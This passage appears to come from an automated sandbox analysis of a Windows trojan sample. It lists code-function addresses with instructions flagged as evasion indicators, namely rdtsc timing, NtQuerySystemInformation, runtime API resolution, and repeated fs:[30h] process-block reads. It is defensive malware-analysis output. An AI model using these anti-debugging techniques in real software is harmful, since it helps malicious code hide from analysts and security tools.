          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004088B0 rdtsc 3_2_004088B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A69860
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_740D1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_740D1A98
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_7378458C mov eax, dword ptr fs:[00000030h]1_2_7378458C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_7378478F mov eax, dword ptr fs:[00000030h]1_2_7378478F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h]3_2_00A520A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A690AF mov eax, dword ptr fs:[00000030h]3_2_00A690AF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328AE mov eax, dword ptr fs:[00000030h]3_2_00A328AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328AE mov eax, dword ptr fs:[00000030h]3_2_00A328AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328AE mov eax, dword ptr fs:[00000030h]3_2_00A328AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328AE mov ecx, dword ptr fs:[00000030h]3_2_00A328AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328AE mov eax, dword ptr fs:[00000030h]3_2_00A328AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328AE mov eax, dword ptr fs:[00000030h]3_2_00A328AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]3_2_00A5F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h]3_2_00A5F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h]3_2_00A5F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A29080 mov eax, dword ptr fs:[00000030h]3_2_00A29080
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A23880 mov eax, dword ptr fs:[00000030h]3_2_00A23880
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A23880 mov eax, dword ptr fs:[00000030h]3_2_00A23880
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h]3_2_00AA3884
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h]3_2_00AA3884
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]3_2_00A4B8E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]3_2_00A4B8E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]3_2_00A240E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]3_2_00A240E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h]3_2_00A240E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A258EC mov eax, dword ptr fs:[00000030h]3_2_00A258EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328FD mov eax, dword ptr fs:[00000030h]3_2_00A328FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328FD mov eax, dword ptr fs:[00000030h]3_2_00A328FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A328FD mov eax, dword ptr fs:[00000030h]3_2_00A328FD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A270C0 mov eax, dword ptr fs:[00000030h]3_2_00A270C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A270C0 mov eax, dword ptr fs:[00000030h]3_2_00A270C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE18CA mov eax, dword ptr fs:[00000030h]3_2_00AE18CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]3_2_00ABB8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A54020 mov edi, dword ptr fs:[00000030h]3_2_00A54020
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h]3_2_00A5002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]3_2_00A3B02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]3_2_00A3B02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]3_2_00A3B02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h]3_2_00A3B02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]3_2_00A4A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]3_2_00A4A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]3_2_00A4A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h]3_2_00A4A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A26800 mov eax, dword ptr fs:[00000030h]3_2_00A26800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A26800 mov eax, dword ptr fs:[00000030h]3_2_00A26800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A26800 mov eax, dword ptr fs:[00000030h]3_2_00A26800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h]3_2_00AF4015
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h]3_2_00AF4015
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]3_2_00AA7016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]3_2_00AA7016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h]3_2_00AA7016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4F86D mov eax, dword ptr fs:[00000030h]3_2_00A4F86D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF1074 mov eax, dword ptr fs:[00000030h]3_2_00AF1074
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2073 mov eax, dword ptr fs:[00000030h]3_2_00AE2073
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1843 mov eax, dword ptr fs:[00000030h]3_2_00AE1843
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25050 mov eax, dword ptr fs:[00000030h]3_2_00A25050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25050 mov eax, dword ptr fs:[00000030h]3_2_00A25050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A25050 mov eax, dword ptr fs:[00000030h]3_2_00A25050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h]3_2_00A40050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h]3_2_00A40050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A27057 mov eax, dword ptr fs:[00000030h]3_2_00A27057
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A361A7 mov eax, dword ptr fs:[00000030h]3_2_00A361A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A361A7 mov eax, dword ptr fs:[00000030h]3_2_00A361A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A361A7 mov eax, dword ptr fs:[00000030h]3_2_00A361A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A361A7 mov eax, dword ptr fs:[00000030h]3_2_00A361A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h]3_2_00A561A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h]3_2_00A561A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]3_2_00AE49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]3_2_00AE49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]3_2_00AE49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h]3_2_00AE49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA69A6 mov eax, dword ptr fs:[00000030h]3_2_00AA69A6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]3_2_00AA51BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]3_2_00AA51BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]3_2_00AA51BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h]3_2_00AA51BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5C9BF mov eax, dword ptr fs:[00000030h]3_2_00A5C9BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5C9BF mov eax, dword ptr fs:[00000030h]3_2_00A5C9BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AFF1B5 mov eax, dword ptr fs:[00000030h]3_2_00AFF1B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AFF1B5 mov eax, dword ptr fs:[00000030h]3_2_00AFF1B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h]3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5A185 mov eax, dword ptr fs:[00000030h]3_2_00A5A185
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4C182 mov eax, dword ptr fs:[00000030h]3_2_00A4C182
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEA189 mov eax, dword ptr fs:[00000030h]3_2_00AEA189
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEA189 mov ecx, dword ptr fs:[00000030h]3_2_00AEA189
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A52990 mov eax, dword ptr fs:[00000030h]3_2_00A52990
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A54190 mov eax, dword ptr fs:[00000030h]3_2_00A54190
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2519E mov eax, dword ptr fs:[00000030h]3_2_00A2519E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2519E mov ecx, dword ptr fs:[00000030h]3_2_00A2519E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A231E0 mov eax, dword ptr fs:[00000030h]3_2_00A231E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A2B1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A2B1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]3_2_00A2B1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AB41E8 mov eax, dword ptr fs:[00000030h]3_2_00AB41E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF89E7 mov eax, dword ptr fs:[00000030h]3_2_00AF89E7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A399C7 mov eax, dword ptr fs:[00000030h]3_2_00A399C7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A399C7 mov eax, dword ptr fs:[00000030h]3_2_00A399C7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A399C7 mov eax, dword ptr fs:[00000030h]3_2_00A399C7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A399C7 mov eax, dword ptr fs:[00000030h]3_2_00A399C7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE19D8 mov eax, dword ptr fs:[00000030h]3_2_00AE19D8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A44120 mov ecx, dword ptr fs:[00000030h]3_2_00A44120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A23138 mov ecx, dword ptr fs:[00000030h]3_2_00A23138
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h]3_2_00A5513A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h]3_2_00A5513A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]3_2_00A29100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]3_2_00A29100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h]3_2_00A29100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A30100 mov eax, dword ptr fs:[00000030h]3_2_00A30100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A30100 mov eax, dword ptr fs:[00000030h]3_2_00A30100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A30100 mov eax, dword ptr fs:[00000030h]3_2_00A30100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2C962 mov eax, dword ptr fs:[00000030h]3_2_00A2C962
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF8966 mov eax, dword ptr fs:[00000030h]3_2_00AF8966
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEE962 mov eax, dword ptr fs:[00000030h]3_2_00AEE962
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h]3_2_00A2B171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h]3_2_00A2B171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h]3_2_00A4B944
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B944 mov eax, dword ptr fs:[00000030h]3_2_00A4B944
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2395E mov eax, dword ptr fs:[00000030h]3_2_00A2395E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2395E mov eax, dword ptr fs:[00000030h]3_2_00A2395E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE1951 mov eax, dword ptr fs:[00000030h]3_2_00AE1951
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A21AA0 mov eax, dword ptr fs:[00000030h]3_2_00A21AA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A55AA0 mov eax, dword ptr fs:[00000030h]3_2_00A55AA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A55AA0 mov eax, dword ptr fs:[00000030h]3_2_00A55AA0
